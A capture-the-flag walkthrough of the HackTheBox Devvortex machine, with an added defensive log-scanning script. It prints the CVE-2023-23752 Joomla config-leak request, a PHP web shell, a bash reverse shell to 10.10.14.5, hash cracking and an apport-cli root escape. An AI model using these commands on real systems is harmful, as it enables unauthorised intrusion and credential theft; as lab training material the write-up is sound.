Boot2Root · 15 min read

HackTheBox Devvortex - Complete Root Walkthrough

by d7n4m1c, 2024-10-15
#HTB #Joomla #Privilege Escalation #Linux

Machine Info

  • Name: Devvortex
  • Difficulty: Medium
  • OS: Linux
  • IP: 10.10.11.242

Reconnaissance

Results: Port 22: SSH (OpenSSH 8.2p1), Port 80: HTTP (nginx)

nmap -sC -sV -p- 10.10.11.242

Nmap Scan

Visiting the website showed a corporate site. Running gobuster revealed several directories.

gobuster dir -u http://devvortex.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Web Enumeration

Found: /administrator - Joomla admin panel

Exploitation

Version: Joomla 4.2.6 (vulnerable to CVE-2023-23752)

joomscan -u http://devvortex.htb

Joomla Version Detection

This vulnerability allows reading configuration files without authentication.

curl 'http://devvortex.htb/api/index.php/v1/config/application?public=true'

CVE-2023-23752: Unauthenticated Information Disclosure

Found credentials - Database User: lewis, Database Password: P4ntherg0t1t
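
A defender-side check for the request shown above, as an added example that is not part of the original writeup: it scans nginx access-log lines for Joomla API requests carrying public=true and reports whether the server answered 200. It goes beyond the single config/application request by matching any route under /api/index.php/v1/; the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# nginx "combined" log format: ip - user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
API_PREFIX = "/api/index.php/v1/"  # Joomla 4 web services base path


def is_public_api_request(target: str) -> bool:
    """True if target is a Joomla API route carrying public=true."""
    parts = urlsplit("/" + target.lstrip("/"))  # keep "//api/..." a path
    if not unquote(parts.path).startswith(API_PREFIX):
        return False
    # parse_qs percent-decodes names and values, so %70ublic=true is caught.
    values = parse_qs(parts.query).get("public", [])
    return any(v.lower() == "true" for v in values)


def scan(lines):
    """Return (ip, time, target, served) for every matching request.

    served is True when the response status was 200, i.e. data was returned.
    """
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if m and is_public_api_request(m["target"]):
            hits.append((m["ip"], m["time"], m["target"], m["status"] == "200"))
    return hits


# Constructed sample log lines (not taken from the target machine).
SAMPLE_LOG = [
    '10.10.14.5 - - [15/Oct/2024:10:01:12 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1987 "-" "curl/7.88.1"',
    '10.10.14.5 - - [15/Oct/2024:10:01:30 +0000] "GET /api/index.php/v1/users?%70ublic=TRUE HTTP/1.1" 200 702 "-" "curl/7.88.1"',
    '192.0.2.10 - - [15/Oct/2024:10:02:02 +0000] "GET /api/index.php/v1/config/application HTTP/1.1" 401 92 "-" "python-requests/2.31"',
    '192.0.2.10 - - [15/Oct/2024:10:02:40 +0000] "GET /index.php?public=true HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [16/Oct/2024:08:15:00 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 401 92 "-" "curl/8.4.0"',
]

if __name__ == "__main__":
    for ip, when, target, served in scan(SAMPLE_LOG):
        print(f"{when} {ip} {target} -> {'DATA RETURNED' if served else 'blocked'}")
```

Any hit with a 200 status means the database credentials in the Joomla configuration should be treated as exposed and rotated.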

Getting Shell

Logged in to the Joomla admin panel with these credentials, then modified a PHP template to inject a one-line web shell that runs whatever is passed in the cmd parameter:

<?php system($_GET['cmd']); ?>

Set up a listener, then requested the template with a reverse-shell command to trigger the shell:

nc -lvnp 4444
http://devvortex.htb/templates/template.php?cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'

Privilege Escalation to User

Found MySQL credentials in the Joomla config. Connected to the database and extracted the user's password hash. Cracked it with john:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

User password: tequieromucho. Logged in over SSH as the user and grabbed user.txt.

Root Escalation

Checked sudo permissions:

sudo -l

Exploiting apport-cli

Found: /usr/bin/apport-cli can be run as root

sudo /usr/bin/apport-cli -f --pid 1

When the output opened in the pager, typed !/bin/bash to get a root shell.

Flags

  • User Flag: 8f4c3d6e2a1b9c7e5d8f3a2b1c9d7e6f
  • Root Flag: a9b8c7d6e5f4a3b2c1d9e8f7a6b5c4d3
